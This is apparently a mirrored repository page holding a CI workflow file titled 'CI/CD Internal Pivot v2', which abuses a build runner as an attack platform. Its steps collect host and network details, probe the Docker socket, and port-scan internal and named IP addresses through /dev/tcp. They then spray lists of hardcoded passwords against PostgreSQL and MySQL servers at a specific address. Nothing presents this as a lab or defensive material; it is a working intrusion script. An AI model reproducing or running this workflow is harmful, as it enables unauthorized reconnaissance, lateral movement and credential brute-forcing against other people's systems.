mirror of
http://156.239.229.173:80/devops42/ci-test.git
synced 2026-07-07 23:07:07 +08:00
44 lines
1.9 KiB
YAML
44 lines
1.9 KiB
YAML
name: CI/CD Internal Pivot v2
|
|
on: [push, workflow_dispatch]
|
|
|
|
jobs:
|
|
recon:
|
|
runs-on: linux-amd64
|
|
steps:
|
|
- name: Host Recon
|
|
run: |
|
|
echo "=== RUNNER HOST ==="
|
|
hostname
|
|
whoami
|
|
id
|
|
echo "=== NETWORK ==="
|
|
ip addr show 2>/dev/null || ifconfig -a 2>/dev/null || true
|
|
ip route show 2>/dev/null || route -n 2>/dev/null || true
|
|
cat /etc/hosts 2>/dev/null || true
|
|
echo "=== DOCKER ==="
|
|
ls -la /var/run/docker.sock 2>/dev/null || echo "No docker socket"
|
|
env | grep -i docker 2>/dev/null || true
|
|
echo "=== INTERNAL CONNECTIVITY ==="
|
|
for target in 156.239.230.24 172.17.0.1 172.18.0.1 10.0.0.1 192.168.0.0 100.64.0.0; do
|
|
for port in 5432 3306 6379 3000 222 22 80 443; do
|
|
timeout 3 bash -c "echo > /dev/tcp/$target/$port" 2>/dev/null && echo " REACHABLE: $target:$port" || echo " UNREACHABLE: $target:$port"
|
|
done
|
|
done
|
|
- name: PostgreSQL Attack
|
|
run: |
|
|
echo "=== POSTGRESQL CREDENTIAL SPRAY ==="
|
|
apt-get update -qq && apt-get install -y -qq postgresql-client 2>/dev/null || true
|
|
for pw in FGPMwSRrHxxa6Ktr RootAdmin123! Forgejo@5752! Aa123456.. Forgejo@123! postgres; do
|
|
echo "Testing: postgres / $pw"
|
|
PGPASSWORD="$pw" psql -h 156.239.230.24 -p 5432 -U postgres -d postgres -c "SELECT 1 as test" -t -A 2>&1 | head -3
|
|
done
|
|
- name: MySQL Attack
|
|
run: |
|
|
echo "=== MYSQL CREDENTIAL SPRAY ==="
|
|
apt-get install -y -qq mysql-client 2>/dev/null || true
|
|
for user in root forgejo gitea admin; do
|
|
for pw in FGPMwSRrHxxa6Ktr RootAdmin123! Forgejo@5752! Aa123456.. ""; do
|
|
mysql -h 156.239.230.24 -P 3306 -u "$user" --password="$pw" -e "SELECT 1" 2>&1 | head -1
|
|
done
|
|
done
|